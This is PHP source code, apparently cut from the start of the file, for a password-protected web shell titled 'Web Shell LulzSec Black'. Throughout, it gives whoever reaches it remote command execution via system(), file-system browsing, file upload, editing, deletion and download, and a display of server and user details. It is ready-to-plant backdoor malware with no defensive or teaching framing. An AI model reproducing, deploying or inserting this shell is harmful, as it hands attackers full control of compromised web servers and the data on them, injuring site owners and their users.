if (!isset($_SESSION['authenticated'])) {
    if (isset($_POST['pass']) && $_POST['pass'] === $auth_pass) {
        $_SESSION['authenticated'] = true;
    } else {
        echo '<!DOCTYPE html><html><head><title>Auth</title><style>body{background:#111;color:#0f0;font-family:monospace;text-align:center;padding-top:100px;}input{background:#000;color:#0f0;border:1px solid #0f0;padding:10px;}form{display:inline-block;}</style></head><body><form method="post"><input type="password" name="pass" placeholder="Password"><input type="submit" value="Login"></form></body></html>';
        exit;
    }
}

function perms($file) {
    $perms = fileperms($file);
    $info = ($perms & 0x4000) ? 'd' : '-';
    $info .= ($perms & 0x0100) ? 'r' : '-';
    $info .= ($perms & 0x0080) ? 'w' : '-';
    $info .= ($perms & 0x0040) ? 'x' : '-';
    $info .= ($perms & 0x0020) ? 'r' : '-';
    $info .= ($perms & 0x0010) ? 'w' : '-';
    $info .= ($perms & 0x0008) ? 'x' : '-';
    $info .= ($perms & 0x0004) ? 'r' : '-';
    $info .= ($perms & 0x0002) ? 'w' : '-';
    $info .= ($perms & 0x0001) ? 'x' : '-';
    return $info;
}

$cwd = isset($_GET['path']) ? $_GET['path'] : getcwd();
chdir($cwd);

if (isset($_GET['delete'])) {
    $target = $_GET['delete'];
    if (is_file($target)) unlink($target);
    elseif (is_dir($target)) rmdir($target);
}

if (isset($_POST['editfile']) && isset($_POST['content'])) {
    file_put_contents($_POST['editfile'], $_POST['content']);
}

if (isset($_FILES['upload'])) {
    move_uploaded_file($_FILES['upload']['tmp_name'], $_FILES['upload']['name']);
}

function formatSize($bytes) {
    $sizes = ['B', 'KB', 'MB', 'GB'];
    $i = 0;
    while ($bytes >= 1024 && $i < count($sizes) - 1) {
        $bytes /= 1024;
        $i++;
    }
    return round($bytes, 2) . ' ' . $sizes[$i];
}

function goBackLink($path) {
    $parent = dirname($path);
    return "<a href='?path=$parent'>&larr; Back</a>";
}

echo "<html><head><title>Web Shell LulzSec Black</title><style>
body { background:#111; color:#0f0; font-family:monospace; padding:20px; }
h1 { text-align:center; color:#0ff; text-shadow: 0 0 5px #0ff; }
table { width:100%; border-collapse:collapse; margin-top:10px; }
th, td { border:1px solid #0f0; padding:5px; text-align:left; }
a { color:#0ff; text-decoration:none; }
a:hover { text-decoration:underline; }
input, select, textarea { background:#000; color:#0f0; border:1px solid #0f0; padding:5px; width:100%; }
input[type='submit'], button { width:auto; cursor:pointer; }
.box { background:#000; padding:10px; margin:10px 0; border:1px solid #0f0; }
</style></head><body>";
echo "<h1>Web Shell LulzSec Black</h1>";
echo "<div class='box'><b>Current Path:</b> $cwd <br>" . goBackLink($cwd) . "</div>";
echo '<div class="box"><form method="POST" enctype="multipart/form-data">Upload: <input type="file" name="upload"><input type="submit" value="Upload"></form></div>';
echo '<div class="box"><form method="POST">Command: <input type="text" name="cmd"><input type="submit" value="Run"></form></div>';

if (isset($_POST['cmd'])) {
    echo '<div class="box"><b>Command Output:</b><br><textarea readonly>'; system($_POST['cmd']); echo '</textarea></div>';
}

echo "<table><tr><th>Name</th><th>Size</th><th>Perms</th><th>Actions</th></tr>";
foreach (scandir($cwd) as $item) {
    $path = realpath($item);
    $size = is_file($item) ? formatSize(filesize($item)) : '-';
    $perm = perms($item);
    echo "<tr><td>$item</td><td>$size</td><td>$perm</td><td>";
    if (is_dir($item)) {
        echo "<a href='?path=$path'>[Open]</a> ";
    } else {
        echo "<a href='?edit=$path'>[Edit]</a> <a href='?download=$path'>[Download]</a> ";
    }
    echo "<a href='?delete=$path' onclick=\"return confirm('Delete $item?');\">[Delete]</a></td></tr>";
}
echo "</table>";

if (isset($_GET['edit'])) {
    $file = $_GET['edit'];
    $content = htmlspecialchars(file_get_contents($file));
    echo "<div class='box'><h3>Editing: $file</h3><form method='POST'><input type='hidden' name='editfile' value='$file'><textarea name='content'>$content</textarea><br><input type='submit' value='Save'></form></div>";
}

if (isset($_GET['download'])) {
    $file = $_GET['download'];
    if (file_exists($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename=' . basename($file));
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }
}

echo "<div class='box'><b>System Info:</b><br><pre>";
echo "OS: " . PHP_OS . "\n";
echo "PHP: " . phpversion() . "\n";
echo "User: " . get_current_user() . "\n";
echo "Server IP: " . $_SERVER['SERVER_ADDR'] . "\n";
echo "Client IP: " . $_SERVER['REMOTE_ADDR'] . "\n";
echo "</pre></div>";
echo "</body></html>";
?>